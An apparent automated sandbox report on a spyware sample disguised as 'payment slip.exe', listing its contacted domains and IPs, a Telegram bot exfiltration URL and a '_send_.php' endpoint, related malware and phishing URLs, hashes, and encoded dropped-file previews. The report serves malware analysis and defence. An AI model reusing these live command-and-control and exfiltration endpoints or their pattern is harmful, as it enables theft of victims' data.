http://varders.kozow.com:8081 | payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp | false | 15% Virustotal; Avira URL Cloud: safe | unknown
http://r11.i.lencr.org/0 | RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20a | RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://aborters.duckdns.org:8081 | payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp | false | 12% Virustotal; Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.m | RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?L | RegSvcs.exe, 00000002.00000002.3839548945.0000000002711000.00000004.00000800.00020000.00000000.sdmp | false | 3% Virustotal; Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | RegSvcs.exe, 00000002.00000002.3839548945.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000259A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://anotherarmy.dns.army:8081 | payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp | false | 15% Virustotal; Avira URL Cloud: malware | unknown
http://x1.c.lencr.org/0 | RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838901959.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838901959.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/q | payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=enlB | RegSvcs.exe, 00000002.00000002.3839548945.00000000026B0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mail.tradolgt.com | RegSvcs.exe, 00000002.00000002.3839548945.0000000002711000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://reallyfreegeoip.org | RegSvcs.exe, 00000002.00000002.3839548945.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000256F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/ | payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000256F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
208.91.199.115 | mail.tradolgt.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1485149
Start date and time: 2024-07-31 08:59:14 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: payment slip.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/4@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 47
• Number of non-executed functions: 297
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
03:00:31 | API Interceptor | 11668364x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | viVOqZjAT0.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | RFQ New Order - 57m³ LPG SEMI TRAILER 7 NOS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger |
149.154.167.220 | e-dekont.exe | malicious | AgentTesla |
149.154.167.220 | Packing_List.vbs | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Nuevo orden.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | QH098767890000.bat.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Shipping Documents 2906381504.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | qnOcrxwuiR.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | PRODUCTS LIST.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Your_New_Social_Security_Statement.wsf | malicious | XWorm |
188.114.96.3 | http://memberships.garenna.id.vn/css/hitcount.jsp | malicious | Unknown | memberships.garenna.id.vn/images/spin-title.png
188.114.96.3 | PO-00349.xls | malicious | Remcos | ft.ax/k7B
188.114.96.3 | PO-00349.xls | malicious | Remcos | ft.ax/k7B
188.114.96.3 | waybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xls | malicious | GuLoader, Remcos | hq.ax/
188.114.96.3 | POSH20240605.xls | malicious | Remcos | wx.ax/Wx8
188.114.96.3 | TT51109240018351.exe | malicious | FormBook | www.globaltrend.xyz/srh8/
188.114.96.3 | 4Ad6ei71uD.exe | malicious | DCRat, PureLog Stealer, zgRAT | 429517cm.nyashka.top/pipeprocessorGameLongpollGeneratorWordpressLocalcentral.php
188.114.96.3 | COMANDA BELOR NR13 DIN 240715.xls | malicious | Remcos | wx.ax/e5E
188.114.96.3 | waybill_shipping_documents_original_BL_CI&PL_29_07_2024_00000000_doc.xls | malicious | Remcos | tny.wtf/jqfJ
188.114.96.3 | Scan document.xls | malicious | Unknown | hq.ax/s2K
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | SecuriteInfo.com.Win32.PWSX-gen.23596.1174.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | PO.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | cargo detail.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | Piping Bulk Material Details.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | RFQ New Order - 57m³ LPG SEMI TRAILER 7 NOS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | Packing_List.vbs | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | YENİ SİPARİŞ SABO RFQ 2701203-GREECE 10224_pdf.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | Fiyat ve Termin Talebi Hk... 400 adet08.03.2024 0191621#_pdf.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | Nuevo orden.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | Arrival Notice.exe | malicious | Snake Keylogger | 188.114.97.3
checkip.dyndns.com | SecuriteInfo.com.Win32.PWSX-gen.23596.1174.exe | malicious | PureLog Stealer, Snake Keylogger | 193.122.130.0
checkip.dyndns.com | PO.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | PO.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | cargo detail.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | Piping Bulk Material Details.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | RFQ New Order - 57m³ LPG SEMI TRAILER 7 NOS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 132.226.8.169
checkip.dyndns.com | Packing_List.vbs | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | YENİ SİPARİŞ SABO RFQ 2701203-GREECE 10224_pdf.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | Fiyat ve Termin Talebi Hk... 400 adet08.03.2024 0191621#_pdf.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | Nuevo orden.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
api.telegram.org | viVOqZjAT0.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | RFQ New Order - 57m³ LPG SEMI TRAILER 7 NOS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | e-dekont.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | Packing_List.vbs | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Nuevo orden.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | QH098767890000.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Shipping Documents 2906381504.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | qnOcrxwuiR.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | PRODUCTS LIST.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Your_New_Social_Security_Statement.wsf | malicious | XWorm | 149.154.167.220
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      TELEGRAMRUviVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                      • 149.154.167.220
                                      https://claim-zigdao.com/Get hashmaliciousUnknownBrowse
                                      • 149.154.170.96
                                      RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
                                      Packing_List.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
  Nuevo orden.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  QH098767890000.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  Shipping Documents 2906381504.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  qnOcrxwuiR.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  PRODUCTS LIST.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
CLOUDFLARENET US
  Ziraat Bankası Swift Mesajı_1.docx.doc | malicious | Unknown | 104.21.76.154
  http://plonoer.com.ru/QUYmT/ | malicious | HTMLPhisher | 104.17.25.14
  https://tti-sftpl--c.visualforce.com/resource/1574239418000/TTILOGO | malicious | Unknown | 172.64.155.119
  Sign02110.exe | malicious | PureLog Stealer | 188.114.97.3
  UW-GIUGNO24 - Ordine finale.exe | malicious | PureLog Stealer | 188.114.97.3
  SecuriteInfo.com.Win32.PWSX-gen.23596.1174.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
  PO.exe | malicious | Snake Keylogger | 188.114.96.3
  https://trbsbmiqha.cfolks.pl/unnamed.png | malicious | Unknown | 1.1.1.1
  viVOqZjAT0.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 104.16.185.241
  cargo detail.exe | malicious | Snake Keylogger | 188.114.97.3
UTMEM US
  RFQ New Order - 57m³ LPG SEMI TRAILER 7 NOS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 132.226.8.169
  Nuevo orden.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
  General Attachment.exe | malicious | Snake Keylogger | 132.226.247.73
  QH098767890000.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
  https://orr.swq.mybluehost.me/ch/ | malicious | Unknown | 132.226.214.62
  MT GLOBAL GLORY V1909 AGENT NOMINATION.exe | malicious | Snake Keylogger | 132.226.247.73
  Vsl Particulars.exe | malicious | Snake Keylogger | 132.226.8.169
  Swift copy 00473.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.247.73
  Booking_No063.vbe | malicious | Snake Keylogger | 132.226.247.73
  Order Details.exe | malicious | Snake Keylogger | 132.226.247.73
PUBLIC-DOMAIN-REGISTRY US
  Invoice and parking list.pdf.exe | malicious | AgentTesla, PureLog Stealer | 162.251.85.202
  RFQ New Order - 57m³ LPG SEMI TRAILER 7 NOS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 162.222.225.16
  https://www.naturist.guide/stats/ct.php?t=2&g=3&id=118&url=https://MSOFT_DOCUSIGN_VERIFICATION_SECURED-DOC_OFFICE.zatrdg.com/page-authentication/lp1KnkIVTV4OQaYeRtRaU7PfJ8aa3O/Cnichols | malicious | Unknown | 208.91.198.96
  shipping doc.exe | malicious | AgentTesla | 162.251.85.202
  (No subject) (44).eml | malicious | Unknown | 208.91.198.96
  Shipping Documents.exe | malicious | AgentTesla | 162.251.85.202
  SecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exe | malicious | AgentTesla | 208.91.198.143
  ynhHNexysa.exe | malicious | AgentTesla | 208.91.199.224
  2FBexXRCHR.rtf | malicious | AgentTesla | 208.91.199.224
  file.exe | malicious | SystemBC | 103.50.162.156
Match
  Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad
  SecuriteInfo.com.Win32.PWSX-gen.23596.1174.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.96.3
  PO.exe | malicious | Snake Keylogger | 188.114.96.3
  cargo detail.exe | malicious | Snake Keylogger | 188.114.96.3
  Piping Bulk Material Details.exe | malicious | Snake Keylogger | 188.114.96.3
  UECzma0Kki.exe | malicious | Unknown | 188.114.96.3
  UECzma0Kki.exe | malicious | Unknown | 188.114.96.3
  RFQ New Order - 57m³ LPG SEMI TRAILER 7 NOS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 188.114.96.3
  Packing_List.vbs | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
  YENİ SİPARİŞ SABO RFQ 2701203-GREECE 10224_pdf.exe | malicious | Snake Keylogger | 188.114.96.3
  Fiyat ve Termin Talebi Hk... 400 adet08.03.2024 0191621#_pdf.exe | malicious | Snake Keylogger | 188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e
  Sign02110.exe | malicious | PureLog Stealer | 149.154.167.220
  UW-GIUGNO24 - Ordine finale.exe | malicious | PureLog Stealer | 149.154.167.220
  viVOqZjAT0.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
  https://ddd.tiktok7.org/ | malicious | Unknown | 149.154.167.220
  https://exchange.add-solution.de/owa/owa_ocbcadejsm_form?l293yq==/owa_ocbcadejsm_form?l293ys9vd2ffb2niy2fkzwpzbv9mb3jtp0wyotnzut09/owa_ocbcadejsm_form?l293ys9vd2ffb2niy2fkzwpzbv9mb3jtp0wyotnzut09l293yv9vy2jjywrlanntx2zvcm0/tdi5m1ltoxzkmkzmyjjoavkyrmtav3b6yly5bwizsnrqmhd5t1rowlvumdk= | malicious | Unknown | 149.154.167.220
  https://dear-house-request-01.surge.sh/ | malicious | Unknown | 149.154.167.220
  https://hwy.pages.dev/%5C%5C%5C%22https:%5C/%5C/tapestry.tapad.com%5C/tapestry%5C/1?ta_partner_id=950&ta_redirect=https | malicious | HTMLPhisher | 149.154.167.220
  https://yhz.pages.dev/%5C%5C%5C%22https:%5C/%5C/t.myvisualiq.net%5C/impression_pixel?r=739915162&et=i&ago=212&ao=546&aca=26620495&si=4449639&ci=-7&pi=316681543&ad=-7&advt=4470647&chnl=-7&vndr=115&sz=6696&u=%5Bcustom_data%5D&pt=i%5C%5C%5C%22 | malicious | HTMLPhisher | 149.154.167.220
  http://porodix.cyberspector.network/ | malicious | Unknown | 149.154.167.220
  http://ourtime.people-meedia.workers.dev/v3/aboutonlinedating | malicious | HTMLPhisher | 149.154.167.220
                                      No context
Process: C:\Users\user\Desktop\payment slip.exe
File Type: ASCII text, with very long lines (28674), with no line terminators
Category: modified
Size (bytes): 28674
Entropy (8bit): 3.581233785751595
Encrypted: false
SSDEEP: 768:XBQPkzXIfqkY4G04QhBgn2RDAmj0zCOaLHD73Oy3K:wkcfqp4G04QhBc2FAk08HC
MD5: 45B1299C58CB3D5ECB729FB2091F05D3
SHA1: E719E34FF4641D054C264927E80D225938B8CE4A
SHA-256: 041B6BA032AE859065A0AF59BA6D6957B2A0A2AEA26DE83E925F57AE5C8D62F1
SHA-512: 3E34F6C2AF98AE29A004461FFB9A9A147A29EABF981ACB91BD410D008647C70660340BED538C0769C53CA9ACF5CC023304D76045A5FDDDDD2BAF4255EDEC4E7B
Malicious: false
Reputation: low
                                      Preview:5}::=gjh=6jhhh575555:;:<g=;g555555;;=>9:=9g>;:555555;;=>9i=;gf<7555555;;=>::==g=;j555555;;=>9:=fg>;:555555;;=>9i=hgf;h555555;;=>::=jg=88555555;;=>9:>5g>87555555;;=>9i>7gf7j555555;;=>::>9g=;9555555;;=>9:>;g>;h555555;;=>9i>=gf;h555555;;=>::>f88h5;;=>9:>hg>;j555555;;=>=i99kkkkkkgf<9555555;;=>>:9;kkkkkkg=;9555555;;=>=:9=kkkkkkg>;h555555;;=>=i9fkkkkkkgf;h555555;;=>>:9hkkkkkkg=7j555555;;=>=:9jkkkkkkg>;9555555;;=>=i:5kkkkkkgf;h555555;;=>>::7kkkkkkg=;h555555;;=>=::9kkkkkk88h>;;=>=i:;kkkkkkgf<:555555;;=>::i5g=<8555555;;=>9:i7g>;:555555;;=>9ii9gf<7555555;;=>::i;g=88555555;;=>9:i=g>87555555;;=>9iifgf7j555555;;=>::ihg=;9555555;;=>9:ijg>;h555555;;=>9ij5gf;h555555;;=>::j788h5;;=>9:j9g>;6555555;;=>=i;=kkkkkkgf;9555555;;=>>:;fkkkkkkg=<;555555;;=>=:;hkkkkkkg>;6555555;;=>=i;jkkkkkkgf<5555555;;=>>:<5kkkkkkg=;>555555;;=>=:<7kkkkkkg>88555555;;=>=i<9kkkkkkgf87555555;;=>>:<;kkkkkkg=7j555555;;=>=:<=kkkkkkg>;9555555;;=>=i<fkkkkkkgf;h555555;;=>>:<hkkkkkkg=;h555555;;=>=:<jkkkkkk88h>;;=>9i=5gf<8555555;;=>::f5g=;=
Process: C:\Users\user\Desktop\payment slip.exe
File Type: data
Category: dropped
Size (bytes): 122244
Entropy (8bit): 7.867801447217767
Encrypted: false
SSDEEP: 3072:EZVPO88g+YTqeKnMpr0lmSbUz+7omEGwIG9+ZMSwO2eD2bZIo:YPj8iUMebb7pERIG9s5wOgbb
MD5: 6AD6378AFAAC506AF093BCA9C975424D
SHA1: 5B4FFE095F0F3A9D30FCD93F2A779B75EAB04996
SHA-256: 03CFAC725AF532582EE0642B2A73BA3AF8D084867309BD83F5F0D17B5B48CA49
SHA-512: 1DD096986FD744075CD5B5207ED08B80AFF1F30EF795761D9DB59B1312B0597C03DF6706941AFBC73644A938209DB4DE9D923FFE1034D6DD8A3249C8CF5D81D8
Malicious: false
Reputation: low
                                      Preview:EA06..2..C;..N.H..5nn..1..3.U..U......S..&U*...1....v@..~..R.....I...Qy..q.P'....Gi.......*..d3i5.?.]..X..C-..(.....#0;.F.~..f8._f.....N.I.L.5i.:.1...1O..).....r..H.i.F..0RjuZ(.Fj....S@. ..gS..js*.ZeB..k3.Ul.c.....n..t..S).j....6.S..!........@.........o.e"|.0Ui.....l.....#S../......`Q......U.....m.....R.q[|.[".L(t....2.8).....Q.\.Uk..G....5i.d.`.R..]o6.N..hT......U..^..a......3..g.O..y2....13..f.J....S.....0D...(..t..$.....O..%...X.`.........0W......L..)...B.K....jU.!S..q...!R.N.4.L.8.Uh5.E2cS....*.seQ.Lj..d.A..h5jd...`t............*.H.^*.$....fU.lb.V..n.....y..j.j..C..b......Y#.:...S..i....H..:5.J.........QC.Lj..E.!/........N...u.UZ.P.......t.W...-&5h..*........y..F...J$5.u67J..eu.."....mR...Ay.F.s...O.UmwI.h.`....9D..V...8...._i.H.....^......#....H.Mo4[..e#.I*Ri...I.S,.....'....".(..$.9........i.$...F.$.e....ve...;A.P..zm.q{..j..fcQ.RcP.\..^.N,.@......*W.}F.a....Z.Vk..H)Uz|..2._,..d..J...Z."......).n...U#6.u&u`..2...;.P...eF......\.o:..*..
Process: C:\Users\user\Desktop\payment slip.exe
File Type: data
Category: dropped
Size (bytes): 9768
Entropy (8bit): 7.655974649348344
Encrypted: false
SSDEEP: 192:ekTYCxDR8l9LfBjZ/YiWQdLqBMhGuErhTGMjMzUfV6KrK0gWWE9:5T19WLxZ/YjQLqQPErhTGMwzGaFu
MD5: 7AB2E8A01A6B043C2C83C7FCF4D18130
SHA1: 0DA03BABD725A8B5FE04B7DBC14A002065B84AA9
SHA-256: F789C0E17405B1412F362769E9616ADFE6C676C035A51D9F57B9CC7D264DAAF2
SHA-512: 6C434D9C4898D9BAD7A7D52D55775311DFE8D24B9D3CA54F55AF0DEC4AECB97D82055CAE5817123728035B217F5676E0223EBC2B12FE11B16BF6A9E036A0D982
Malicious: false
Reputation: low
                                      Preview:EA06..p...gS...h..V.E.k7.......yg.......k;..g...sg.N.@.]....i...K........|.`.o..g.N.......=.N...>.......m3..7.Z..u>..6...o.v..Z......g.>.N'....Z....N.m3.........>.Ng`...r.'.....c ....Af.H.....@.F.3<..Z..6...L.j........x..t....B|.....Y..0.N.3[<.x...Zf.5_..r....g`5_..z.U..l.5_....U..m@5_..j.U...5\..>3`..N.^.f.Z..u;.z..y;......@........G../Z.........j|....x.u....$.../.y=...g.G_T......-@>_.......zu:..........p...................`.M..`... ...h...@..P.'.9...{>K<..c.....Y.`._..z......>K8#G.g..3|v...G.9..&.8_..uh..i|v.....h.h.-.`......E..<..s.]....'v.;..=..S..L..6...f..+@.ff.y...;..m ...f..E...Y....3...............v............2p....<d....,vl...4.....!+@.'&.....,fy7.Zm6y......r.7.X...c3.L.ok.Y.!...Gf.....,f.>.Om`. .#<.....c..........z.h.s.....,vp...<..t.....40......g ....f.....4..@.6.-..p..S.U..7...S..N..;:.`..>..m....u=.....c....Z...wx.....vv.........E.....@y6....p.c3.M..9..b.!....F ....B5h..'.........vx......f..M.|...B3....@.;=.X...f.....H........g....M.S.T..h...
Process: C:\Users\user\Desktop\payment slip.exe
File Type: data
Category: dropped
Size (bytes): 274944
Entropy (8bit): 6.918703260044045
Encrypted: false
SSDEEP: 6144:Y0htQiMAHXVKTWhC/i/WKE9x32aSXSraTO14AW6ALKY:Y82HAHXVKTWhC/i/W/9x32aSXSGTO14X
MD5: C97745933A300B3D0963609FD5071ED6
SHA1: E1D6F40D7D35446926307B79B2E051411F6E2261
SHA-256: ECB5473781121B81F4F986AF1F42BFD03C5C6F8E162ED7B126A42CF818F34ABC
SHA-512: 285B7CE91817F74C32A569F00CB1057E03FE4479A44E4D5429F650CC45E71139ACC123E9E487F8906F7950779BA7D2A82027117EEDAD2122027A115992FD4274
Malicious: false
Reputation: low
                                      Preview:...N2SCHW2QV.V1.NI0JKSU.VHN1SCHS2QV2RV1QNI0JKSUAVHN1SCHS2QV.RV1_Q.>J.Z.`.I..r. :Aq&@=1C0#iS+%=:5v*+.!6&s[?vv...<!-UdF^_eVHN1SCH.wQV~SU1...VJKSUAVHN.SAIX3.V2NR1QZI0JKSUOmLN1sCHSrUV2R.1QnI0JISUEVHN1SCHW2QV2RV1Q.M0JISUAVHN3S..S2AV2BV1QNY0J[SUAVHN!SCHS2QV2RV1.tM0.KSUA.LN&CCHS2QV2RV1QNI0JKSUA6LN=SCHS2QV2RV1QNI0JKSUAVHN1SCHS2QV2RV1QNI0JKSUAVHN1SCHS.QV:RV1QNI0JKSUIvHNySCHS2QV2RV1.:,H>KSUUMLN1sCHS.UV2PV1QNI0JKSUAVHN.SC(}@"$QRV1F^I0J.WUADHN1MGHS2QV2RV1QNI0.KS.o$-"^0CH_2QV22R1QLI0J{WUAVHN1SCHS2QVrRVsQNI0JKSUAVHN1SCH..UV2RV1.NI0HKVU..JN..BHP2QV.RV7e.K0.KSUAVHN1SCHS2QV2RV1QNI0JKSUAVHN1SCHS2QV2RV1.3.?...<2..N1SCHS3SU6T^9QNI0JKSU?VHNwSCH.2QV.RV1tNI0'KSUeVHNOSCH-2QVVRV1#NI0+KSU.VHN^SCH=2QVLRV1OLa.JKY.gVJf.SCBS..%.RV;.OI0N8pUA\.L1SG;w2Q\.QV1U=l0JA.QAVL=.SCB.7QV6x.1R._6JKH:xVHD1P.]U2QM.tV3ytI0@KysAU.[7SCSy.QT.[V1Ud.CWKSSi.HN;'JHS0.\2RR.OLatJKY.c(CN1WhHy./Z2RR.QdkNGKSQjVbP3.NHS6{tL\V1UeI.h5\UARcN.MA.\2QR.p(!QNM.Jaq+PVHJ.Sij- QV6yV.s0Z0JOxUkt6Z1SGcS.s('RV5zNc.4]SUE}Hd.-THS6zV.p()QNM.JaMW.NHN5yEb12#p$R&2
